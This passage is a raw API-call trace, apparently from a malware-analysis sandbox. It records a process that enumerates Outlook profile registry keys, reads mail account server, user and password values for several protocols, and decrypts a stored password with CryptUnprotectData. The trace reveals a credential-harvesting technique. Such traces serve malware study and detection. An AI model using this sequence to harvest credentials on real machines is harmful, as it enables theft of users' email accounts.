0x780000 [0315.205] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c140 | out: hHeap=0x780000) returned 1 [0315.206] RegCloseKey (hKey=0x220) returned 0x0 [0315.207] GetProcessHeap () returned 0x780000 [0315.207] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b500 | out: hHeap=0x780000) returned 1 [0315.207] GetProcessHeap () returned 0x780000 [0315.207] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78e498 | out: hHeap=0x780000) returned 1 [0315.208] RegCloseKey (hKey=0x21c) returned 0x0 [0315.208] GetProcessHeap () returned 0x780000 [0315.208] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b490 | out: hHeap=0x780000) returned 1 [0315.209] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x1, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="00000002", pcchName=0x19fb4c) returned 0x0 [0315.209] GetProcessHeap () returned 0x780000 [0315.209] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b500 [0315.210] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000002", phkResult=0x79b500 | out: phkResult=0x79b500*=0x21c) returned 0x0 [0315.210] GetProcessHeap () returned 0x780000 [0315.210] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c140 [0315.211] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79c140, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x79c140, pcbData=0x19f6c0*=0x1e) returned 0x0 [0315.211] GetProcessHeap () returned 0x780000 [0315.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.212] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.212] GetProcessHeap () returned 0x780000 [0315.212] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.212] GetProcessHeap () returned 0x780000 [0315.212] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.213] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x1c) returned 0x0 [0315.213] GetProcessHeap () returned 0x780000 [0315.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.214] GetProcessHeap () returned 0x780000 [0315.220] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.221] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.221] GetProcessHeap () returned 0x780000 [0315.222] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.222] GetProcessHeap () returned 0x780000 [0315.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.223] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.223] GetProcessHeap () returned 0x780000 [0315.223] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.223] GetProcessHeap () returned 0x780000 [0315.223] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.224] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Server", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x1a) returned 0x0 [0315.224] GetProcessHeap () returned 0x780000 [0315.225] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.225] GetProcessHeap () returned 0x780000 [0315.225] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.226] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.226] GetProcessHeap () returned 0x780000 [0315.226] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.226] GetProcessHeap () returned 0x780000 [0315.226] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.227] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x1e) returned 0x0 [0315.227] GetProcessHeap () returned 0x780000 [0315.227] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.227] GetProcessHeap () returned 0x780000 [0315.227] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.228] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.228] GetProcessHeap () returned 0x780000 [0315.228] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.228] GetProcessHeap () returned 0x780000 [0315.228] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.229] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.229] GetProcessHeap () returned 0x780000 [0315.230] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.231] GetProcessHeap () returned 0x780000 [0315.231] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.232] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.232] GetProcessHeap () returned 0x780000 [0315.232] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.232] GetProcessHeap () returned 0x780000 [0315.232] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.233] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.233] GetProcessHeap () returned 0x780000 [0315.233] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.233] GetProcessHeap () returned 0x780000 [0315.234] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.235] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.235] GetProcessHeap () returned 0x780000 [0315.235] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.235] GetProcessHeap () returned 0x780000 [0315.235] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.236] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.236] GetProcessHeap () returned 0x780000 [0315.237] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.237] GetProcessHeap () returned 0x780000 [0315.237] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.238] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.238] GetProcessHeap () returned 0x780000 [0315.238] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.238] GetProcessHeap () returned 0x780000 [0315.238] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.239] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Server URL", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.239] GetProcessHeap () returned 0x780000 [0315.239] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.239] GetProcessHeap () returned 0x780000 [0315.239] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.240] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.240] GetProcessHeap () returned 0x780000 [0315.241] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.241] GetProcessHeap () returned 0x780000 [0315.241] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c558 [0315.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.241] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Server", pdwReserved=0x0, pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x79c558, pcbData=0x19f6b8*=0x208) returned 0x2 [0315.242] GetProcessHeap () returned 0x780000 [0315.242] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c558 | out: hHeap=0x780000) returned 1 [0315.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.243] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0315.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.243] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0315.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.245] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0315.245] GetProcessHeap () returned 0x780000 [0315.245] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0315.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.248] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x79a550, pcbData=0x19f6b4*=0x208) returned 0x2 [0315.248] GetProcessHeap () returned 0x780000 [0315.248] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0315.248] GetProcessHeap () returned 0x780000 [0315.249] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0315.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.249] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x79a550, pcbData=0x19f6b4*=0x208) returned 0x2 [0315.249] GetProcessHeap () returned 0x780000 [0315.250] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0315.250] GetProcessHeap () returned 0x780000 [0315.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.251] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x79a550, pcbData=0x19f6b4*=0x208) returned 0x2 [0315.251] GetProcessHeap () returned 0x780000 [0315.251] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0315.251] GetProcessHeap () returned 0x780000 [0315.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.252] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x79a550, pcbData=0x19f6b4*=0x208) returned 0x2 [0315.252] GetProcessHeap () returned 0x780000 [0315.252] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0315.252] GetProcessHeap () returned 0x780000 [0315.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.253] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x79a550, pcbData=0x19f6b4*=0x208) returned 0x2 [0315.253] GetProcessHeap () returned 0x780000 [0315.253] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0315.253] GetProcessHeap () returned 0x780000 [0315.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.254] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x3, pvData=0x79a550*, pcbData=0x19f6b4*=0x121) returned 0x0 [0315.255] LoadLibraryW (lpLibFileName="CRYPT32") returned 0x75830000 [0315.976] CryptUnprotectData (in: pDataIn=0x19f6ac, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x19f6b4 | out: ppszDataDescr=0x0, pDataOut=0x19f6b4) returned 1 [0316.002] GetProcessHeap () returned 0x780000 [0316.002] LocalFree (hMem=0x78d3c8) returned 0x0 [0316.002] GetProcessHeap () returned 0x780000 [0316.002] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798960 | out: hHeap=0x780000) returned 1 [0316.002] GetProcessHeap () returned 0x780000 [0316.002] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.003] GetProcessHeap () returned 0x780000 [0316.003] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.004] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x79a550, pcbData=0x19f6b4*=0x208) returned 0x2 [0316.004] GetProcessHeap () returned 0x780000 [0316.005] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.005] GetProcessHeap () returned 0x780000 [0316.005] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.006] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x79a550, pcbData=0x19f6b4*=0x208) returned 0x2 [0316.006] GetProcessHeap () returned 0x780000 [0316.006] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.006] GetProcessHeap () returned 0x780000 [0316.006] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.007] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x79a550, pcbData=0x19f6b4*=0x208) returned 0x2 [0316.007] GetProcessHeap () returned 0x780000 [0316.008] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.008] GetProcessHeap () returned 0x780000 [0316.008] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.009] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x79a550, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x79a550, pcbData=0x19f6b4*=0x208) returned 0x2 [0316.009] GetProcessHeap () returned 0x780000 [0316.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.009] GetProcessHeap () returned 0x780000 [0316.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c140 | out: hHeap=0x780000) returned 1 [0316.009] GetProcessHeap () returned 0x780000 [0316.009] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.010] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.011] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned 97 [0316.011] GetProcessHeap () returned 0x780000 [0316.011] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc6) returned 0x78eff8 [0316.011] GetProcessHeap () returned 0x780000 [0316.011] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.012] GetProcessHeap () returned 0x780000 [0316.012] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b510 [0316.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.013] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x79b510 | out: phkResult=0x79b510*=0x22c) returned 0x0 [0316.014] GetProcessHeap () returned 0x780000 [0316.014] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c140 [0316.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.015] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x79c140, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0316.015] GetProcessHeap () returned 0x780000 [0316.015] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c140 | out: hHeap=0x780000) returned 1 [0316.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.017] RegCloseKey (hKey=0x22c) returned 0x0 [0316.017] GetProcessHeap () returned 0x780000 [0316.017] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b510 | out: hHeap=0x780000) returned 1 [0316.017] GetProcessHeap () returned 0x780000 [0316.017] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78eff8 | out: hHeap=0x780000) returned 1 [0316.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.018] RegCloseKey (hKey=0x21c) returned 0x0 [0316.019] GetProcessHeap () returned 0x780000 [0316.019] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b500 | out: hHeap=0x780000) returned 1 [0316.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.020] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x2, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="00000003", pcchName=0x19fb4c) returned 0x0 [0316.020] GetProcessHeap () returned 0x780000 [0316.020] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4f0 [0316.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.022] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000003", phkResult=0x79b4f0 | out: phkResult=0x79b4f0*=0x21c) returned 0x0 [0316.022] GetProcessHeap () returned 0x780000 [0316.022] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c140 [0316.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.023] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79c140, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x79c140, pcbData=0x19f6c0*=0x208) returned 0x2 [0316.023] GetProcessHeap () returned 0x780000 [0316.023] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c140 | out: hHeap=0x780000) returned 1 [0316.023] GetProcessHeap () returned 0x780000 [0316.023] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.024] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.025] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned 97 [0316.025] GetProcessHeap () returned 0x780000 [0316.025] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc6) returned 0x78e498 [0316.025] GetProcessHeap () returned 0x780000 [0316.025] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.025] GetProcessHeap () returned 0x780000 [0316.025] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4b0 [0316.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.027] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x79b4b0 | out: phkResult=0x79b4b0*=0x22c) returned 0x0 [0316.027] GetProcessHeap () returned 0x780000 [0316.027] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c140 [0316.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.028] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x79c140, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0316.028] GetProcessHeap () returned 0x780000 [0316.028] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c140 | out: hHeap=0x780000) returned 1 [0316.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.030] RegCloseKey (hKey=0x22c) returned 0x0 [0316.030] GetProcessHeap () returned 0x780000 [0316.030] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4b0 | out: hHeap=0x780000) returned 1 [0316.030] GetProcessHeap () returned 0x780000 [0316.030] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78e498 | out: hHeap=0x780000) returned 1 [0316.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.032] RegCloseKey (hKey=0x21c) returned 0x0 [0316.032] GetProcessHeap () returned 0x780000 [0316.032] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4f0 | out: hHeap=0x780000) returned 1 [0316.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.033] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x3, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0316.033] GetProcessHeap () returned 0x780000 [0316.033] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0316.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.039] RegCloseKey (hKey=0x204) returned 0x0 [0316.039] GetProcessHeap () returned 0x780000 [0316.039] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b410 | out: hHeap=0x780000) returned 1 [0316.039] GetProcessHeap () returned 0x780000 [0316.040] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.041] RegCloseKey (hKey=0x210) returned 0x0 [0316.041] GetProcessHeap () returned 0x780000 [0316.041] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b470 | out: hHeap=0x780000) returned 1 [0316.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.042] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xa, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="dc48e7c6d33441458035ee20beefe18a", pcchName=0x19fb7c) returned 0x0 [0316.042] GetProcessHeap () returned 0x780000 [0316.042] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b490 [0316.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.043] RegOpenKeyW (in: hKey=0x218, lpSubKey="dc48e7c6d33441458035ee20beefe18a", phkResult=0x79b490 | out: phkResult=0x79b490*=0x210) returned 0x0 [0316.044] GetProcessHeap () returned 0x780000 [0316.044] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0316.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.045] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0316.045] GetProcessHeap () 